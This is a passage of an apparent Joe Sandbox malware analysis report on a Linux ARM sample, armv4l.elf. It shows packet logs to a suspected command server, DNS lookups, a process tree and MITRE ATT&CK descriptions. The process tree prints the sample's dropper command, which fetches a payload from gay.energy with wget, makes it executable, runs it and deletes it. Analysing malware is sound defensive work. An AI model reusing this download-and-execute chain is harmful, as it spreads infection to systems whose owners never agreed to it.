May 10, 2025 07:49:06.490799904 CEST	666	40810	92.60.77.69	192.168.2.14
May 10, 2025 07:49:21.229635954 CEST	40812	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:21.546516895 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:49:21.546973944 CEST	40812	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:21.547045946 CEST	40812	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:21.973874092 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:49:22.058608055 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:49:22.058938980 CEST	40812	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:22.070445061 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:49:22.332622051 CEST	666	40812	92.60.77.69	192.168.2.14
May 10, 2025 07:49:37.081484079 CEST	40814	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:37.354676962 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:49:37.355335951 CEST	40814	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:37.355335951 CEST	40814	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:37.628715038 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:49:37.628760099 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:49:37.628782988 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:49:37.629210949 CEST	40814	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:37.903469086 CEST	666	40814	92.60.77.69	192.168.2.14
May 10, 2025 07:49:52.642123938 CEST	40816	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:52.914794922 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:49:52.915446997 CEST	40816	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:52.915447950 CEST	40816	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:53.188688040 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:49:53.188762903 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:49:53.188786030 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:49:53.189469099 CEST	40816	666	192.168.2.14	92.60.77.69
May 10, 2025 07:49:53.463547945 CEST	666	40816	92.60.77.69	192.168.2.14
May 10, 2025 07:50:08.204898119 CEST	40818	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:08.477540016 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:50:08.477925062 CEST	40818	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:08.478044033 CEST	40818	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:08.750845909 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:50:08.750909090 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:50:08.750943899 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:50:08.751274109 CEST	40818	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:09.023956060 CEST	666	40818	92.60.77.69	192.168.2.14
May 10, 2025 07:50:23.766678095 CEST	40820	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:24.039484024 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:50:24.039820910 CEST	40820	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:24.040172100 CEST	40820	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:24.312796116 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:50:24.312854052 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:50:24.312875032 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:50:24.313267946 CEST	40820	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:24.586494923 CEST	666	40820	92.60.77.69	192.168.2.14
May 10, 2025 07:50:39.324376106 CEST	40822	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:39.597943068 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:50:39.598376036 CEST	40822	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:39.598376036 CEST	40822	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:39.871606112 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:50:39.871660948 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:50:39.871697903 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:50:39.872138977 CEST	40822	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:40.145875931 CEST	666	40822	92.60.77.69	192.168.2.14
May 10, 2025 07:50:54.885391951 CEST	40824	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:55.158253908 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:50:55.158627987 CEST	40824	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:55.158627987 CEST	40824	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:55.432693005 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:50:55.432758093 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:50:55.432795048 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:50:55.433212042 CEST	40824	666	192.168.2.14	92.60.77.69
May 10, 2025 07:50:55.706684113 CEST	666	40824	92.60.77.69	192.168.2.14
May 10, 2025 07:51:10.444714069 CEST	40826	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:10.717616081 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:51:10.718262911 CEST	40826	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:10.718264103 CEST	40826	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:10.990947962 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:51:10.991024971 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:51:10.991064072 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:51:10.991432905 CEST	40826	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:11.264062881 CEST	666	40826	92.60.77.69	192.168.2.14
May 10, 2025 07:51:26.002108097 CEST	40828	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:26.278362036 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:51:26.278700113 CEST	40828	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:26.278801918 CEST	40828	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:26.552427053 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:51:26.552500963 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:51:26.552540064 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:51:26.552809000 CEST	40828	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:26.826592922 CEST	666	40828	92.60.77.69	192.168.2.14
May 10, 2025 07:51:41.563075066 CEST	40830	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:41.836890936 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:51:41.837260008 CEST	40830	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:41.837260962 CEST	40830	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:42.110819101 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:51:42.111035109 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:51:42.111074924 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:51:42.111346960 CEST	40830	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:42.385340929 CEST	666	40830	92.60.77.69	192.168.2.14
May 10, 2025 07:51:57.119409084 CEST	40832	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:57.392865896 CEST	666	40832	92.60.77.69	192.168.2.14
May 10, 2025 07:51:57.393224955 CEST	40832	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:57.393225908 CEST	40832	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:57.666775942 CEST	666	40832	92.60.77.69	192.168.2.14
May 10, 2025 07:51:57.666831970 CEST	666	40832	92.60.77.69	192.168.2.14
May 10, 2025 07:51:57.666867018 CEST	666	40832	92.60.77.69	192.168.2.14
May 10, 2025 07:51:57.667201996 CEST	40832	666	192.168.2.14	92.60.77.69
May 10, 2025 07:51:57.940371037 CEST	666	40832	92.60.77.69	192.168.2.14
May 10, 2025 07:52:12.679265976 CEST	40834	666	192.168.2.14	92.60.77.69
May 10, 2025 07:52:12.952128887 CEST	666	40834	92.60.77.69	192.168.2.14
May 10, 2025 07:52:12.952429056 CEST	40834	666	192.168.2.14	92.60.77.69
May 10, 2025 07:52:12.952856064 CEST	40834	666	192.168.2.14	92.60.77.69
May 10, 2025 07:52:13.225678921 CEST	666	40834	92.60.77.69	192.168.2.14
May 10, 2025 07:52:13.225744009 CEST	666	40834	92.60.77.69	192.168.2.14
May 10, 2025 07:52:13.225781918 CEST	666	40834	92.60.77.69	192.168.2.14
May 10, 2025 07:52:13.226171017 CEST	40834	666	192.168.2.14	92.60.77.69
May 10, 2025 07:52:13.499530077 CEST	666	40834	92.60.77.69	192.168.2.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2025 07:48:50.399332047 CEST	46999	53	192.168.2.14	1.1.1.1
May 10, 2025 07:48:50.399394989 CEST	44662	53	192.168.2.14	1.1.1.1
May 10, 2025 07:48:50.540594101 CEST	53	44662	1.1.1.1	192.168.2.14
May 10, 2025 07:48:50.540769100 CEST	44662	53	192.168.2.14	1.1.1.1
May 10, 2025 07:48:50.556044102 CEST	53	46999	1.1.1.1	192.168.2.14
May 10, 2025 07:48:50.556112051 CEST	46999	53	192.168.2.14	1.1.1.1
May 10, 2025 07:48:50.681988955 CEST	53	44662	1.1.1.1	192.168.2.14
May 10, 2025 07:48:50.697469950 CEST	53	46999	1.1.1.1	192.168.2.14
May 10, 2025 07:51:32.552582979 CEST	32797	53	192.168.2.14	1.1.1.1
May 10, 2025 07:51:32.552583933 CEST	34051	53	192.168.2.14	1.1.1.1
May 10, 2025 07:51:32.693795919 CEST	53	34051	1.1.1.1	192.168.2.14
May 10, 2025 07:51:32.693818092 CEST	53	32797	1.1.1.1	192.168.2.14

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 10, 2025 07:48:50.399332047 CEST	192.168.2.14	1.1.1.1	0x35c4	Standard query (0)	gay.energy	A (IP address)	IN (0x0001)	false
May 10, 2025 07:48:50.399394989 CEST	192.168.2.14	1.1.1.1	0xc79b	Standard query (0)	gay.energy	28	IN (0x0001)	false
May 10, 2025 07:48:50.540769100 CEST	192.168.2.14	1.1.1.1	0xc79b	Standard query (0)	gay.energy	28	IN (0x0001)	false
May 10, 2025 07:48:50.556112051 CEST	192.168.2.14	1.1.1.1	0x35c4	Standard query (0)	gay.energy	A (IP address)	IN (0x0001)	false
May 10, 2025 07:51:32.552582979 CEST	192.168.2.14	1.1.1.1	0x420c	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
May 10, 2025 07:51:32.552583933 CEST	192.168.2.14	1.1.1.1	0xd4e3	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 10, 2025 07:48:50.540594101 CEST	1.1.1.1	192.168.2.14	0xc79b	Name error (3)	gay.energy	none	none	28	IN (0x0001)	false
May 10, 2025 07:48:50.556044102 CEST	1.1.1.1	192.168.2.14	0x35c4	Name error (3)	gay.energy	none	none	A (IP address)	IN (0x0001)	false
May 10, 2025 07:48:50.681988955 CEST	1.1.1.1	192.168.2.14	0xc79b	Name error (3)	gay.energy	none	none	28	IN (0x0001)	false
May 10, 2025 07:48:50.697469950 CEST	1.1.1.1	192.168.2.14	0x35c4	Name error (3)	gay.energy	none	none	A (IP address)	IN (0x0001)	false
May 10, 2025 07:51:32.693818092 CEST	1.1.1.1	192.168.2.14	0x420c	No error (0)	daisy.ubuntu.com		162.213.35.24	A (IP address)	IN (0x0001)	false
May 10, 2025 07:51:32.693818092 CEST	1.1.1.1	192.168.2.14	0x420c	No error (0)	daisy.ubuntu.com		162.213.35.25	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: armv4l.elf PID: 5509, Parent PID: 5429

General

Start time (UTC):	05:48:49
Start date (UTC):	10/05/2025
Path:	/tmp/armv4l.elf
Arguments:	/tmp/armv4l.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: armv4l.elf PID: 5511, Parent PID: 5509

General

Start time (UTC):	05:48:49
Start date (UTC):	10/05/2025
Path:	/tmp/armv4l.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: sh PID: 5511, Parent PID: 5509

General

Start time (UTC):	05:48:49
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5523, Parent PID: 5511

General

Start time (UTC):	05:48:49
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: wget PID: 5523, Parent PID: 5511

General

Start time (UTC):	05:48:49
Start date (UTC):	10/05/2025
Path:	/usr/bin/wget
Arguments:	wget -q http://gay.energy/.../vivid -O .....
File size:	548568 bytes
MD5 hash:	996940118df7bb2aaa718589d4e95c08

Chronological Activities

Analysis Process: sh PID: 5524, Parent PID: 5511

General

Start time (UTC):	05:48:50
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 5524, Parent PID: 5511

General

Start time (UTC):	05:48:50
Start date (UTC):	10/05/2025
Path:	/usr/bin/chmod
Arguments:	chmod 777 .....
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: sh PID: 5525, Parent PID: 5511

General

Start time (UTC):	05:48:50
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5525, Parent PID: 5511

General

Start time (UTC):	05:48:50
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	/bin/sh ./.....
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 5527, Parent PID: 5511

General

Start time (UTC):	05:48:50
Start date (UTC):	10/05/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5527, Parent PID: 5511

General

Start time (UTC):	05:48:50
Start date (UTC):	10/05/2025
Path:	/usr/bin/rm
Arguments:	rm -rf .....
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: armv4l.elf PID: 5513, Parent PID: 5509

General

Start time (UTC):	05:48:49
Start date (UTC):	10/05/2025
Path:	/tmp/armv4l.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: armv4l.elf PID: 5514, Parent PID: 5509

General

Start time (UTC):	05:48:49
Start date (UTC):	10/05/2025
Path:	/tmp/armv4l.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Chronological Activities

Analysis Process: armv4l.elf PID: 5517, Parent PID: 5514

General

Start time (UTC):	05:48:49
Start date (UTC):	10/05/2025
Path:	/tmp/armv4l.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report armv4l.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Symbols

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: armv4l.elf PID: 5509, Parent PID: 5429

General

Chronological Activities

Analysis Process: armv4l.elf PID: 5511, Parent PID: 5509

General

Chronological Activities

Analysis Process: sh PID: 5511, Parent PID: 5509

General

Chronological Activities

Analysis Process: sh PID: 5523, Parent PID: 5511

General

Chronological Activities

Analysis Process: wget PID: 5523, Parent PID: 5511

Linux Analysis Report
armv4l.elf